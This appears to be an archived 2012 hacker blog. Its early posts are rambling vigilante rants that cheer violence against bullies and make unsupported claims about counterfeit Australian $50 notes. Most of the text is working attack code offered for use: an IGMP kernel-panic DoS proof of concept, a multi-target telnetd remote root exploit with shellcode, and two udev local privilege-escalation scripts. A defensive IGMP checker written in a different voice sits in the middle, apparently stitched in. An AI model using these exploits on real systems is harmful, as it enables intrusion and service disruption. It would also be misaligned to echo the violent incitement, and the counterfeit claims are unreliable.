
[Bully Breakdown]: Well-knowledged IT_Sec father of a daughter shoots up her laptop, for she was a bully…

Posted on 11th February 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

I guess the video will say it all, eh?

This was the FATHER of a bullying, rebellious young Facebook teenager… she must have had big balls, trying to get this over her own dad :S

Also, this is an example of the world's response to bullies, and the BullyBreakdown project, of which I am the author…

You will find MANY more like this, and this hit the news here.. Channel 10/7/9, you know… it ain't *small*, and it ain't behind any monitors anymore… just remember that, (s)kids ;)

This will only get worse if these wannabe SOPA and DARPA people get their way….

Anyhow folks, enjoy a GREAT vid!

XD / worldwide … army of unrepentant nomadz

On behalf of MMA (Au) and Dana (MMA USA), and all against the bullies online!


BULLY BREAKDOWN! This is the gospel of the ….

Posted on 31st January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Here.. is some help with how I have watched things, and how I react… I am not in any way affiliated with the people shown below.

BUT, I can say, big brothers are now online, and will punish the naughty boys and gals.

This will be brutal and significant: assimilation and annihilation of small groups who try to destroy people and places they NEVER knew EVER existed… and will still remain nonexistent….

Brothers In Arms ..

Remember, what happens ONLINE could also happen OFFLINE…

In times of war…

http://www.fiveaa.com.au/article_man-shot-at-munno-para-west_111377

Shit happens…

^^ For those who annoy… too much… sometimes this is the ONLY way…

In the end, it is basically like this for the bullies..

http://www.break.com/index/the-best-of-the-worst-parkour-edition-2294595

http://video.couriermail.com.au/2189968224/Horrifying-home-invasion?area=videoindex7

Poor poor wannabe bullies only get ONE thing.

http://video.couriermail.com.au/2191276513/Comanchero-home-movie?area=videoindex4

^^RESPECT

RECURSIVE FORCE!

Now the power within you is maybe a little stronger… don't be afraid of ONLINE and OFFLINE BULLIES, use their own weapons against them, and may peace be with you all, especially the youth…

And, for all the rest, I guess you should be LOYAL and follow some things you see offline, online…

Remember, treat others how YOU would want to be treated.. or face the wrath of many now-empowered people…

JACK THE RIPPER

R.I.P Giove ..

Words of Wisdom, things you MUST know…

Posted on 29th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

My name, I will not give you… but, this is as good as…

I was 11 when I first used a Commodore 64, then became trained by someone even younger than me to run warez; he was 10, and gave me EVERY component he had, to show me what I needed…
I am FUGiTiVE.ACU (Australian Crackers United), later then formed with ParaDOX/ANGELS, then started a splinter cell group here…. I owned AT&T; there were NO laws then, so their method was brutality.
Simple: they rang my house at all times of day, even to speak with me (CIA) and USA feds, and eventually they got to my father…. This is when I was forced, with Police in tow, to sell the PC in FRONT of their eyes, and never come back, ever… These are things only the very old members will know, and this happened… look for me on any .AU warez from the Amiga 500; the Firestarters was the first group I was in….

Anyhow, this is NOT about hate…. it is about allowing people to control you.
I was a sleeper cell unit/cluster of friends, VERY close, and we only commune IRL; you people should use the old team codes… believe me.. the law will not hurt you… if you're trained.
To some of the people who can only DDoS, I understand, but I beg, please ask the elders to be schooled, don't fight.. for we will lose the most precious FUCKUP in history…
USE their weaponry and mistakes; this is the way of the warrior online, for if you attack only with DDoS etc., this will not get voiced, but if you school them, they really are bound by laws, through France, Italy, Brasil/Rio/Barcelona, UK… These are splinter groups I PERSONALLY trained with mouse_, for this reason….
NOW, we are awake… and my teams will start to move in on anti-warez..

Be strong, as it will look like shit for a bit, but as I mentioned, when the Sleepers movie was made, it had nothing to do with this; we borrowed their names, as they waited, and had vengeful justice, and lived through it; the deaths of 2 still made sure ONE was OK.
This is the MOB mentality you MUST adopt, and it is HARD… but ask Mouse_ how hard I am, ask others how hard I am, and why I am here..
I am no idiot… mark my words.. be strong, UNITE, for united you stand, alone you fall; learn to code a little, not much, as they have already messed it so much that there are other groups at work now, picking them to pieces; reverse engineering skill is not a base of hacking but it is often the most powerful weapon ya have… stay strong Aussies, and unite as I did… this is NOT hate, this is love, for my country, my voice, and the Net.
XD / FUGiTIVE

Remember, at the end of “SLEEPERS” (movie), who did win???

nme, and anyone else trying to ring me, don't.. there are reasons, think ;) later buddies….


Aussies, unite, look at your $50 notes… now read on… for you, I lay my life down… xd / Fugitive/ACUParadox/Angels/Paranoimia, head of AU relations with French warez, CORE, PARANOiMIA (USA – Snow / USA ex CORE); may the phorce now be with you…

Posted on 28th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Australians,
May I beg one minute of your time, and please, I have also tried to get the pictures up and just cannot for the life of me; however, the details are given now..

On the $50 AUD note, take a look

there is specifically a bug with the ‘forged’ copies; they are in 4 areas..

A. the top numbering.. look for the ones which start with a 9, not a 0; this is easy now, as they're EVERYWHERE
B. look underneath the notes which have the 9 numbers, and look underneath both photos; there will be two important names missing.. this is the second feature
C. look at the signatures on the 9-digit notes; these will also be different…

The ones which are bad will have all 4 bugs; the good AUD is not with these.. there are reasons..
9 because the reserve bank simply works on population, per capita.. this == our economy…
These notes were made so well, the banks will deny of course… but it is not so easy to hide now you can see what I am seeing daily.. and live with…
You now hold my life in your hands.
May the force be with you, for this will not be for me..
amen.
XD

[NEWS]: DONT BE SCARED ONLiNE!

Posted on 27th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

TO clarify why etc. is easy now, and I think all crews now understand this was never hate, but only ever love… for the scene, and for freedom!

This is to respect ALL the people who have in some way helped; please be nice to them… some names …
ISG/magikh0e/peanuter/ac1db1tch3z/Mouse_/tropic/nme … may the phorce be with you!
This is what could have happened online.. I am trying to silence this post, but it will only be a reminder of what can happen when the ‘kids’ get involved in man's business, or woman's, but you must learn and understand what a prodigy child is.. and respect them….

—> this is going to be closed today, as it will only be up because silly ppl got involved in things they never knew about to begin with.. but I do respect these people, and I can honestly say I hate this WP :P coz I'm trying to make it already for only admins or regged/admin users who were invited here.. so it will be done and closed to the public but will always serve as a great reminder.. for I have passed the torch to the same people I once abused….
Times change, and especially when ya fuck wit the warez!!

[DoS]: Code of ‘Undead’ attack by KCOPE. But this seems to be REMOTE, not just LAN-based; GREAT for learning about DoS, about ICMP/IGMP/TCP/IP, packet sequences, and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

I'll just put the straight-up crappy PoC up, which was on the FD lists; right or wrong, this can attack OUTSIDE the LAN or WLAN :P
So, use some thinking; maybe update this post with your OWN version for a change.
Go hard… I will have a closer look when I have more time, but I know that my exploit for Windows is set up in similar fashion, and this is simply because of the way the IGMP and ICMP membership bugs read things, so it had to be at the least 0.0.0.0; localhost would fail… as that's an IP… so, I guess, good luck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}
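The two packets the PoC above sends are an 8-byte IGMPv2 query followed by a 12-byte IGMPv3-length query whose Max Resp Code is 0; the kernel fix for CVE-2012-0207 clamps that zero delay to 1 before it is used as a divisor. As an added example (not code from the page or from the kernel), the checker below verifies the IGMP checksum, decodes the Max Resp Code per RFC 3376, and flags such a query the way a sensor or a hardened receiver would; the function names and the constructed test packets are mine.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IGMP_HOST_MEMBERSHIP_QUERY 0x11  /* same type byte the PoC sends */
#define IGMP_V1V2_QUERY_LEN 8
#define IGMPV3_QUERY_MIN_LEN 12          /* RFC 3376 query header */

enum igmp_query_verdict {
    IGMP_Q_NOT_A_QUERY = 0,
    IGMP_Q_TRUNCATED,
    IGMP_Q_BAD_CHECKSUM,
    IGMP_Q_V1,
    IGMP_Q_V2,
    IGMP_Q_V3,
    IGMP_Q_V3_ZERO_MAXRESP   /* the shape that triggered CVE-2012-0207 */
};

/* Ones' complement Internet checksum over the IGMP message (big-endian words). */
static uint16_t igmp_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) {
        sum += (uint32_t)((data[0] << 8) | data[1]);
        data += 2;
        len -= 2;
    }
    if (len == 1)
        sum += (uint32_t)(data[0] << 8);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Decode the IGMPv3 Max Resp Code (RFC 3376 section 4.1.1) into tenths of a
 * second: values below 128 are literal, otherwise a 4-bit mantissa with a
 * 3-bit exponent. A code of 0 decodes to 0, which is what the fixed kernel
 * refuses to use as-is. */
unsigned int igmpv3_max_resp_time(uint8_t code)
{
    if (code < 128)
        return code;
    return ((code & 0x0f) | 0x10) << (((code >> 4) & 0x07) + 3);
}

/* Classify one IGMP message (IP header already stripped). A compliant querier
 * never sends a v3 query with a zero max response time, so a sensor can alert
 * on it; a receiver would clamp it to 1 as the kernel fix does. */
enum igmp_query_verdict igmp_classify_query(const uint8_t *msg, size_t len,
                                            unsigned int *max_resp_out)
{
    if (len < IGMP_V1V2_QUERY_LEN)
        return IGMP_Q_TRUNCATED;
    if (msg[0] != IGMP_HOST_MEMBERSHIP_QUERY)
        return IGMP_Q_NOT_A_QUERY;
    /* summing a message that carries a correct checksum yields zero */
    if (igmp_checksum(msg, len) != 0)
        return IGMP_Q_BAD_CHECKSUM;
    if (len >= IGMPV3_QUERY_MIN_LEN) {
        unsigned int mrt = igmpv3_max_resp_time(msg[1]);
        if (max_resp_out)
            *max_resp_out = mrt;
        return mrt == 0 ? IGMP_Q_V3_ZERO_MAXRESP : IGMP_Q_V3;
    }
    /* 8-byte query: v1 if the code byte is 0, otherwise v2 */
    if (max_resp_out)
        *max_resp_out = msg[1];
    return msg[1] == 0 ? IGMP_Q_V1 : IGMP_Q_V2;
}

/* Constructed test vector in the PoC's layout (type, max resp code, checksum,
 * group 0.0.0.0, zero padding) with a correct checksum. Returns bytes
 * written, 0 if the buffer is too small. */
size_t make_sample_query(uint8_t *out, size_t len, uint8_t max_resp_code)
{
    uint16_t csum;
    if (len < IGMP_V1V2_QUERY_LEN)
        return 0;
    memset(out, 0, len);
    out[0] = IGMP_HOST_MEMBERSHIP_QUERY;
    out[1] = max_resp_code;
    csum = igmp_checksum(out, len);
    out[2] = (uint8_t)(csum >> 8);
    out[3] = (uint8_t)(csum & 0xff);
    return len;
}
```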

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous ‘targets’ copy I was apparently keeping from everyone… enjoy (with targets! and even addable targets!)!

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Succes reading intial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to triger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most of the inetd impletantions have a connection limit per second
 * so you must chage this if you start getting errors reading responses
 *  - for 60 conex per min  900000
 *  - for 40 conex per min 1500000
 *  - for no limit 300000 should work
 */
#define BRUTE_TOUT 600000  // seems pretty fair on cpu ..
#define MAXKEYLEN 64-1

struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86 */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/* Check if the shellcode worked, slightly simpler than shell (int) */
static int checkmagic (int fd) {
  char got[32];
  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  if (read (fd, got, 32) <= 0)
    return -1;
  return -!strstr (got, "foo");
}

static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}

static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if(pconn < 0) {
   printf("Socket error: %i\n", pconn);
   printf("Err message: %s\n", strerror(errno));
   return (-1);
   }
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
   close(pconn);
   return -1;
   }
   return pconn;
}

static void usage(char *arg) {
    int x = 0;
    printf("Available Targets:\n\n");
    /* print tagets */
    while(targets[x].address != NULL) {
    printf("  %2i: %s\n", x + 1, targets[x].desc);
    x++;
    }
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;
  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
  printf("[-] Error connecting: %i\n", errno);
  return -1;
  }
  /* Read initial server request */
  ret = read(conn, readbuf, 256);
  if (ret <= 0) {
  printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
  close (conn);
  return -1;
  }
  printf("[<] Success reading intial server request %i bytes ..\n", ret);
  /* printf("ATTACH DEBUGGER & PRESS KEY TO CONITNUE\n"); */
  /* ret = getchar(); */
  /* Send encryption and IV */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != sizeof(tnet_init_enc)) {
  printf("[-] Error sending init encryption: %i\n", ret);
  close (conn);
  return -1;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");
  /* Read response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response\n");
  close (conn);
  return -1;
  } else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the first payload with the overflow */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload first time\n");
  close (conn);
  return -1;
  }
  printf("[>] First payload to overwrite function pointer sent\n");
  /* Read Response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response ..\n");
  close (conn);
  return -1;
  }
  else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the payload again to tigger the function overwrite */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload second time ..\n");
  close (conn);
  return -1;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");
  if (tryshell) {
  /* Start the semi interactive shell */
  printf("[*] Got root?\n");
  shell(conn);
  ret = 0;
  } else {
  printf ("[*] Does this work? ");
  /* Just check if it works */
  if (checkmagic (conn) == 0) {
  printf ("YES!\n");
  printf ("Add the Target address to the targets list & recomple!\n");
  ret = 0;
  } else {
  printf ("[-] Nope,try again ..\n");
  ret = -1;
  }
  }
  close (conn);
  return ret;
}

int main(int argc, char *argv[]) {
      int offset = 0;
      int target;
      int i;
      unsigned int address;
      /* Payload Size */
      int psize = (sizeof(struct key_info) +
      sizeof(tnet_option_enc_keyid) +
      sizeof(tnet_end_suboption));
      struct key_info bad_struct;
      unsigned char payload[psize];
      if (argc != 4) {
      usage(argv[0]);
      return -1;
      }
      /* Fill the structure */
      memset(&bad_struct, 0x90, sizeof(struct key_info));
      memcpy(bad_struct.keylen,   "DEAD", 4);
      memcpy(bad_struct.dir,      "BEEF", 4);
      target = atoi(argv[3]) - 1;
      /* Target selection */
      struct target_profile *t;
      t = &targets[target];
      printf("Target: %s\n\n", t->desc);
      for (i = 0; !i || target < 2; i++) {
      offset = 0;
      memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
      memcpy (&address, t->address, 4);
      address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
      printf ("[*] Target address: 0x%04x\n", address);
      memcpy(bad_struct.modep, &address, 4); /* Readable address */
      memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */
      /* Prepare the payload with the overflow */
      memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
      offset += sizeof(tnet_option_enc_keyid);
      memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
      offset += sizeof(bad_struct);
      memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
      if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)
      break;
      usleep (BRUTE_TOUT);
    }
    return 0;
}

ENJOY! The ‘pvt’ so-called version ;)
XD

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope version and the Underground bash version, have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
cat > ud.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

int main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}
_EOF
gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
_EOF
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles
cat > acc.c << _EOF
#include <unistd.h>

int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
_EOF
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
